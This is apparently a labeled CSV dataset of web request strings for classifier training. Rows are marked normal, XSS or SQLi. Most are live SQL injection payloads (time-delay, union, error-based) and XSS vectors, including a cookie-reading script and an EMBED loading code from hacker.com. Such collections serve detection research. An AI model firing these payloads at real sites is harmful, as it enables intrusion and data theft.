'nond' = 'nond",2,SQLi,12863 -"1 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) # kkmw",2,SQLi,15162 -<iframe onpointermove=alert(1)>XSS</iframe>,1,XSS,7570 -"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ||'",2,SQLi,19545 -"1"" ) union all select null--",2,SQLi,22050 -"<div draggable=""true"" contenteditable>drag me</div><command ondrop=alert(1) contenteditable>drop here</command>",1,XSS,2136 -"1%"" ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,22574 -")) or ((x""))=((""x",2,SQLi,9963 -"1' ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( 'ossj' = 'ossj",2,SQLi,18873 -"{""id"":null,""name"":""production""}",0,normal,25575 -"1%"" ) ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( ""%"" = """,2,SQLi,21596 -<span onpointermove=alert(1)>XSS</span>,1,XSS,6960 -"""),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10950 -<dfn onpointerover=alert(1)>XSS</dfn>,1,XSS,6393 -1') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='1337,2,SQLi,11409 -"<fieldset onpaste=""alert(1)"" contenteditable>test</fieldset>",1,XSS,5983 -1' ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 'nhrc' like 'nhrc,2,SQLi,19426 -<button onpointerenter=alert(1)>XSS</button>,1,XSS,7540 -1)) or sleep(5)#,2,SQLi,10392 -"{""id"":null,""firstName"":""Steleven"",""lastName"":""Ang"",""address"":""7422 Martin Ave #8"",""city"":""742"",""telephone"":""4758838722""}",0,normal,25508 -Select triple-check.,0,normal,24752 -"<col draggable=""true"" ondragstart=""alert(1)"">test</col>",1,XSS,6688 -"<details onkeyup=""alert(1)"" contenteditable>test</details>",1,XSS,7175 -"{""id"":null,""name"":""African Bush Elephant""}",0,normal,26075 -"<rb onbeforecopy=""alert(1)"" contenteditable>test</rb>",1,XSS,6484 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--",2,SQLi,10717 -"1"" ) as hymr where 5497 = 5497 union all select null,null,null,null--",2,SQLi,20200 -select ( case when ( 5142 = 6855 ) then 5142 else 5142* ( select 5142 from mysql.db ) end ) #,2,SQLi,18310 -"-8355%"" ) ) ) union all select 3004,3004,3004,3004,3004,3004,3004--",2,SQLi,21748 -"-4135"" ) as leiz where 3582 = 3582 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,19951 -"<span onmouseover=""alert(1)"">test</span>",1,XSS,3711 -"<style>:target {color: red;}</style><audio id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></audio>",1,XSS,3270 -"1"" ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ""fpqh"" = ""fpqh",2,SQLi,22619 -"{""id"":null,""firstName"":""Li"",""lastName"":""Er"",""address"":""10 Anson Road 11-18 International Plaza"",""city"":""654"",""telephone"":""6481170165""}",0,normal,25394 -( select ( case when ( 1421 = 1421 ) then 1 else 1421* ( select 1421 from master..sysdatabases ) end ) ),2,SQLi,22080 -"1"" ) where 4905 = 4905 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,21438 -I'll select my tie.,0,normal,24514 -Select your game.,0,normal,25105 -"1"" ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ""igop"" = ""igop",2,SQLi,12813 -<sup id=x tabindex=1 ondeactivate=alert(1)></sup><input id=y autofocus>,1,XSS,7050 -declare @s varchar ( 200 ) select @s = 0x77616974 ...,2,SQLi,11772 -ORDER BY 17#,2,SQLi,10325 -</title><</script/script><script ~~~>\u0061lert(1)</script ~~~>,1,XSS,9490 -"<a href=""javas\x07cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,410 -"1' ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,19546 -"<img src=""x` `<script>javascript:alert(1)</script>""` `>",1,XSS,641 -select * from users where id = 1 or \.<1 or 1 = 1 -- 1,2,SQLi,11485 -"1"" ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ""isbh"" like ""isbh",2,SQLi,19060 -select ( case when ( 2294 = 3651 ) then 2294 else 2294* ( select 2294 from information_schema.character_sets ) end ) #,2,SQLi,18514 -"<textarea ondblclick=""alert(1)"">test</textarea>",1,XSS,3924 -"{""id"":null,""firstName"":""Chan"",""lastName"":""Sung"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25750 -"1%"" ) and sleep ( 5 ) #",2,SQLi,21282 -"1%"" ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,22249 -"),NULL)%20waifor%20delay%20'0:0:20'%20/*",2,SQLi,10909 --2745 ) ) as aywp where 9735 = 9735 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,16793 -ORDER BY 14#,2,SQLi,10322 -"select count ( * ) from generate_series ( 1,5000000 ) # fnck",2,SQLi,18762 -"<dt onmouseleave=""alert(1)"">test</dt>",1,XSS,7600 -"1"" or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""bkrk"" = ""bkrk",2,SQLi,19431 -"<bdi onkeyup=""alert(1)"" contenteditable>test</bdi>",1,XSS,1889 -"-3438"" ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""nxiv"" = ""nxiv",2,SQLi,19752 -if ( 8574 = 7534 ) select 8574 else drop function nxbe--,2,SQLi,15972 -Select a fabric for the sewing project.,0,normal,24426 -Select your vow.,0,normal,25135 -"setTimeout(\\""writetitle()\\"",$\_GET\[\])",1,XSS,7616 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i",2,SQLi,11150 -"<frame onmouseover=""alert(1)"">test</frame>",1,XSS,7370 -select sleep ( 5 ),2,SQLi,15144 -"1"" ) ) ) union all select null,null,null,null,null--",2,SQLi,12288 -"select * from users where id = 1 or "" ( _"" or 1 = 1 -- 1",2,SQLi,12038 -"1' ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( 'lwlh' = 'lwlh",2,SQLi,19791 -"<plaintext onbeforepaste=""alert(1)"" contenteditable>test</plaintext>",1,XSS,3858 -"<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>",1,XSS,9285 -"{""id"":null,""firstName"":""Audrey"",""lastName"":""Hee"",""address"":""2853 S Central Expy"",""city"":""497"",""telephone"":""4442835805""}",0,normal,25988 -Select your question.,0,normal,25150 -"-1254"" or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual )",2,SQLi,22130 -"1 ) as vzyk where 5103 = 5103 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,18799 --1714' union all select 6687--,2,SQLi,19304 -"{""id"":null,""name"":""aside""}",0,normal,25932 -Select a style for your blog layout.,0,normal,24374 -"1%' union all select null,null,null,null,null,null,null,null#",2,SQLi,22096 -"<spacer oncontextmenu=""alert(1)"">test</spacer>",1,XSS,2688 -"-8893 ) union all select 7594,7594,7594,7594,7594,7594#",2,SQLi,21887 -"1%' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( '%' = '",2,SQLi,18913 -Search records where valid.,0,normal,23493 -<colgroup id=x tabindex=1 onfocusin=alert(1)></colgroup>,1,XSS,3169 -on,0,normal,23314 -"<div draggable=""true"" contenteditable>drag me</div><u ondrop=alert(1) contenteditable>drop here</u>",1,XSS,2784 -"{""id"":null,""name"":""Boltmon""}",0,normal,25644 -(||6),2,SQLi,11173 -<x%09onxxx=1,1,XSS,9346 -<frameset onload=alert(123)>,1,XSS,1072 -"1"" ) ) as gbxx where 2459 = 2459 waitfor delay '0:0:5'--",2,SQLi,21337 -I'll select chocolate.,0,normal,24976 -"<fieldset onmouseenter=""alert(1)"">test</fieldset>",1,XSS,2969 -<![endif]-->,1,XSS,9805 -"<figure onkeypress=""alert(1)"" contenteditable>test</figure>",1,XSS,7394 -<source onpointerenter=alert(1)>XSS</source>,1,XSS,2248 -"<option onmouseleave=""alert(1)"">test</option>",1,XSS,6518 -<tbody onpointerenter=alert(1)>XSS</tbody>,1,XSS,6054 -"<em onkeydown=""alert(1)"" contenteditable>test</em>",1,XSS,3644 -<article id=x tabindex=1 ondeactivate=alert(1)></article><input id=y autofocus>,1,XSS,7609 -"<small onmousemove=""alert(1)"">test</small>",1,XSS,5715 -<acronym id=x tabindex=1 onactivate=alert(1)></acronym>,1,XSS,7015 -"<track draggable=""true"" ondragend=""alert(1)"">test</track>",1,XSS,3589 -1' ) ) or sleep ( 5 ) and ( ( 'uzhd' like 'uzhd,2,SQLi,12829 -"<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>",1,XSS,197 -"<div draggable=""true"" contenteditable>drag me</div><video ondrop=alert(1) contenteditable>drop here</video>",1,XSS,5428 -""")) waitfor delay '0:0:20' /*",2,SQLi,10984 -Specify filters where needed.,0,normal,23545 -1 ) ) as lkqx where 6468 = 6468 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,19072 -Aggregate data where valid.,0,normal,23498 -"1 ) ) as rual where 4649 = 4649 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,14792 -"<samp onmousemove=""alert(1)"">test</samp>",1,XSS,1816 -Where's the database file?,0,normal,23576 -"1%' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and '%' = '",2,SQLi,13800 -"<style>:target {color:red;}</style><dt id=x style=""transition:color 1s"" ontransitionend=alert(1)></dt>",1,XSS,6629 -Modify the privacy settings for your account.,0,normal,23146 -<svg onload=alert(1)>,1,XSS,7607 -1%' ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( '%' = ',2,SQLi,17249 -<command onpointerenter=alert(1)>XSS</command>,1,XSS,2523 -"inurl:""webapp/wcs""",1,XSS,9393 -<textarea onpointerover=alert(1)>XSS</textarea>,1,XSS,6921 -1 ) as vxsh where 4706 = 4706,2,SQLi,16605 -"-6363"" ) where 4043 = 4043 union all select 4043,4043,4043,4043,4043,4043,4043,4043,4043--",2,SQLi,22562 -"{""id"":null,""firstName"":""Luke"",""lastName"":""Yiin"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25472 -"create or replace function sleep ( int ) returns int as '/lib/libc.so.6','sleep' language 'c' strict",2,SQLi,22107 -<header onpointermove=alert(1)>XSS</header>,1,XSS,4266 -"1', ( select ( case when ( 5217 = 5217 ) then 1 else 5217* ( select 5217 from mysql.db ) end ) )",2,SQLi,20201 -"-->'""/></sCript><svG x="">"" onload=(co\u006efirm)``>",1,XSS,9608 -"<style>@keyframes slidein {}</style><meter style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></meter>",1,XSS,5283 -"1 ) as drbw where 2380 = 2380 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,19083 -I'm considering where to go for a cultural experience.,0,normal,24062 -<wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus>,1,XSS,5020 -"<var onkeyup=""alert(1)"" contenteditable>test</var>",1,XSS,4255 -"<font draggable=""true"" ondragstart=""alert(1)"">test</font>",1,XSS,8843 -"1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( 'dtym' = 'dtym",2,SQLi,20741 -Fetch information where valid.,0,normal,23481 -onSeek,1,XSS,9711 -Create quiz.,0,normal,23291 -"-1055' union all select 7758,7758,7758,7758,7758,7758--",2,SQLi,18638 -Select bar.,0,normal,24722 -"<noscript onpaste=""alert(1)"" contenteditable>test</noscript>",1,XSS,2609 -"-3298 union all select 7618,7618,7618,7618,7618,7618,7618,7618,7618,7618#",2,SQLi,21324 -"1"" ) as jiiq where 6847 = 6847",2,SQLi,13928 -<meter onfocusout=alert(1) tabindex=1 id=x></meter><input autofocus>,1,XSS,4541 -I'm thinking of where to go for some relaxation.,0,normal,24114 -"UNION ALL SELECT 1,2--",2,SQLi,10597 -"<xss id=x style=""transition:outline 1s"" ontransitionend=alert(1) tabindex=1></xss>",1,XSS,39 -veris-->group<svg/onload=alert(/XSS/)//,1,XSS,1113 -AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337,2,SQLi,11268 -"<IMG SRC=x onmouseover=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1157 -"-4135' ) ) ) union all select 4413,4413,4413#",2,SQLi,21464 -"1 union all select null,null,null,null,null,null,null,null#",2,SQLi,22571 -Select gain.,0,normal,24953 -"{""id"":null,""firstName"":""Han"",""lastName"":""Tan"",""address"":""93 NORTH 9TH STREET, BROOKLYN NY 11211"",""city"":""798"",""telephone"":""5541027493""}",0,normal,25682 -<tt id=x tabindex=1 onactivate=alert(1)></tt>,1,XSS,7938 -"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ""layz"" = ""layz",2,SQLi,19987 -1 ) ) and 4595 = 4595#,2,SQLi,19063 -or pg_SLEEP(5)#,2,SQLi,10425 -"1 ) union all select null,null,null,null,null,null,null,null#",2,SQLi,21194 -"`""'><img src=xxx:x \x0Donerror=javascript:alert(1)>",1,XSS,528 -"<listing onbeforecut=""alert(1)"" contenteditable>test</listing>",1,XSS,2481 -"1"" ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""dwcy"" = ""dwcy",2,SQLi,15296 -"1"" and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,18868 -"1' ) ) as uncy where 8009 = 8009 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,20642 -"1"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 )",2,SQLi,14551 -"1"" ) ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( ""xnsj"" like ""xnsj",2,SQLi,12631 -"-9558"" ) ) ) union all select 2935,2935,2935,2935,2935--",2,SQLi,16261 --4324 order by 1--,2,SQLi,18827 -Specify filters where applicable.,0,normal,23429 -She updates her hairstyle.,0,normal,23195 -"<style>:target {transform: rotate(180deg);}</style><xss id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></xss>",1,XSS,7418 -"alert;pg(""XSS"")",1,XSS,1120 -"-7078'|| ( select 'lcza' where 5076 = 5076 union all select 5076,5076,5076,5076,5076,5076,5076,5076,5076,5076--",2,SQLi,16447 -"1"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,15529 -1'|| ( select 'ytwz' from dual where 3025 = 3025 and ( 5039 = 5303 ) *5303 ) ||',2,SQLi,15450 -",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10944 -)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11293 -Select your dream car.,0,normal,24459 -Create a unique painting.,0,normal,22834 -1' ) as sruz where 6318 = 6318,2,SQLi,21066 -"{""id"":null,""name"":""Minun""}",0,normal,25484 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--",2,SQLi,10608 -<data onpointerup=alert(1)>XSS</data>,1,XSS,3060 -Create drawing.,0,normal,23263 -"1'|| ( select 'votg' where 5105 = 5105 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,16273 -"1%"" ) order by 1#",2,SQLi,13930 -"1' ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'dfsj' = 'dfsj",2,SQLi,18456 -"<param oncut=""alert(1)"" contenteditable>test</param>",1,XSS,5201 -or 1 = 1,2,SQLi,11844 -<iframe onpointerup=alert(1)>XSS</iframe>,1,XSS,7113 -"{""id"":null,""firstName"":""Edmond"",""lastName"":""Tan"",""address"":""33 Lewis Rd #46"",""city"":""486"",""telephone"":""4152050977""}",0,normal,25621 -1'|| ( select 'abjv' from dual where 4200 = 4200,2,SQLi,20899 -"<bdi oncontextmenu=""alert(1)"">test</bdi>",1,XSS,5484 -"-4236' ) union all select 2076,2076,2076,2076,2076,2076,2076,2076,2076,2076#",2,SQLi,22383 -"1"" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""tkkg"" = ""tkkg",2,SQLi,17232 -"1%"" ) ) union all select null,null,null,null,null,null--",2,SQLi,20484 -"<summary draggable=""true"" ondrag=""alert(1)"">test</summary>",1,XSS,6073 -"1' ) ) as kwre where 7775 = 7775 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,14743 -like '%',2,SQLi,10027 -select ( case when ( 4059 = 7807 ) then 4059 else 1/ ( select 0 ) end ) --,2,SQLi,20195 -") or 1""=""1""/*",2,SQLi,10041 -"1"" ) where 8407 = 8407 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,18169 -"<div draggable=""true"" contenteditable>drag me</div><main ondragover=alert(1) contenteditable>drop here</main>",1,XSS,8669 -"<strong oncontextmenu=""alert(1)"">test</strong>",1,XSS,8092 -"<div id=""x"">x</div> <xml:namespace prefix=""t""> <import namespace=""t"" implementation=""#default#time2""> <t:set attributeName=""innerHTML"" targetElement=""x"" to=""&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"">",1,XSS,684 -"<shadow onmousedown=""alert(1)"">test</shadow>",1,XSS,2507 -"-8038' ) ) or elt ( 1032 = 1032,3623 ) and ( ( 'xfyq' = 'xfyq",2,SQLi,18561 -"&lt;XSS STYLE=\""xss&#58;expression(alert('XSS'))\""&gt;",1,XSS,961 -"1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'pbqg' = 'pbqg",2,SQLi,18265 -"-2625"" ) ) as qfuo where 1980 = 1980 union all select 1980,1980,1980--",2,SQLi,21840 -"-2855"" ) ) ) union all select 1496,1496,1496,1496#",2,SQLi,21524 -<caption id=x tabindex=1 onbeforeactivate=alert(1)></caption>,1,XSS,3352 -"1 where 1062 = 1062 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,16274 -Select your swap.,0,normal,25231 -)) or pg_sleep(5)--,2,SQLi,11404 -"1"" or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,21797 -FSCommand,1,XSS,9621 -"<abbr onmousedown=""alert(1)"">test</abbr>",1,XSS,8394 -"1%"" ) ) union all select null,null,null,null,null,null,null#",2,SQLi,22271 -"perl -e ';print "";&;<;SCR\0IPT>;alert("";XSS"";)<;/SCR\0IPT>;"";;'; >; out",1,XSS,1595 -"1%' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and '%' = '",2,SQLi,15845 -"1"" ) where 5065 = 5065",2,SQLi,15897 -"{""id"":null,""name"":""Flamedramon""}",0,normal,25563 -"1%"" and 2805 = 1345",2,SQLi,19098 -"<rp draggable=""true"" ondragenter=""alert(1)"">test</rp>",1,XSS,3211 -"<svg onmouseup=""alert(1)"">test</svg>",1,XSS,2885 -"<head oncopy=""alert(1)"" contenteditable>test</head>",1,XSS,6233 -"and (select substring(@@version,3,1))='c'",2,SQLi,10381 --7319 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,12259 -<audio onpointerout=alert(1)>XSS</audio>,1,XSS,5888 -"{""id"":null,""firstName"":""Han Jie"",""lastName"":""Kwong"",""address"":""10 Anson Road, #21-02, International Plaza"",""city"":""358"",""telephone"":""4302411445""}",0,normal,25943 -"1 ) as oblq where 2002 = 2002 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,13374 -1' or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,14715 -1'+ ( select wpbj where 1849 = 1849,2,SQLi,19928 -Select site.,0,normal,24729 -<center id=x tabindex=1 ondeactivate=alert(1)></center><input id=y autofocus>,1,XSS,2695 -"-2325' ) ) ) union all select 1442,1442,1442--",2,SQLi,20853 -"{""id"":null,""name"":""Aromatisse""}",0,normal,26016 -select ( case when ( 6045 = 2786 ) then 6045 else 1/ ( select 0 ) end ) --,2,SQLi,18332 -"1"" ) rlike ( select ( case when ( 8732 = 6244 ) then 1 else 0x28 end ) ) and ( ""unuk"" = ""unuk",2,SQLi,16370 -"1"" ) where 5814 = 5814 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --",2,SQLi,14521 -1' ) ) waitfor delay '0:0:5' and ( ( 'bbqk' = 'bbqk,2,SQLi,19580 -<input4 onpointerleave=alert(1)>XSS</input4>,1,XSS,4881 --9541 where 4291 = 4291 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,19175 -"1"" where 8016 = 8016",2,SQLi,13212 -"select * from users where id = 1 or 1<@ = 1 union select 1,version ( ) -- 1",2,SQLi,11938 -"<style>@keyframes x{}</style><menu style=""animation-name:x"" onanimationstart=""alert(1)""></menu>",1,XSS,8704 -"-9392 ) ) or elt ( 1032 = 1032,3623 ) and ( ( 2975 = 2975",2,SQLi,16323 -"{""id"":null,""name"":""Kakuna""}",0,normal,25253 -<strike onpointerenter=alert(1)>XSS</strike>,1,XSS,7500 -"1 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) -- dtha",2,SQLi,14058 -"1%' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and '%' = '",2,SQLi,19067 -"<EMBED SRC=""http://hacker.com/xss.swf"" AllowScriptAccess=""always"">",1,XSS,1312 -"1"" and make_set ( 8403 = 8403,8899 ) and ""fqxr"" like ""fqxr",2,SQLi,15928 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#",2,SQLi,10660 -"-4849"" ) ) or ( 5005 = 9111 ) *9111 and ( ( ""catv"" like ""catv",2,SQLi,20443 -He ordered a meal from the food delivery app.,0,normal,24053 -Let's choose a location for our meetup.,0,normal,24044 -"<dialog onkeyup=""alert(1)"" contenteditable>test</dialog>",1,XSS,6474 --4768'|| ( select 'dded' from dual where 6499 = 6499 union all select 6499--,2,SQLi,20524 -1 ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 3836 = 3836,2,SQLi,18784 -"1%' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( '%' = '",2,SQLi,17599 -<source onpointermove=alert(1)>XSS</source>,1,XSS,2326 -1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'psdl' like 'psdl,2,SQLi,17931 -top[“al”+”ert”](1),1,XSS,4112 -"<meter onmouseout=""alert(1)"">test</meter>",1,XSS,2579 -"-9884' ) or elt ( 1942 = 8409,8409 ) and ( 'tqdq' like 'tqdq",2,SQLi,21544 -Select your submission.,0,normal,25126 -"1 ) union all select null,null,null,null--",2,SQLi,15974 -<set onpointerdown=alert(1)>XSS</set>,1,XSS,6663 -"{""id"":null,""name"":""Spinarak""}",0,normal,25478 -Modify the style.,0,normal,23075 -"1%' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and '%' = '",2,SQLi,12314 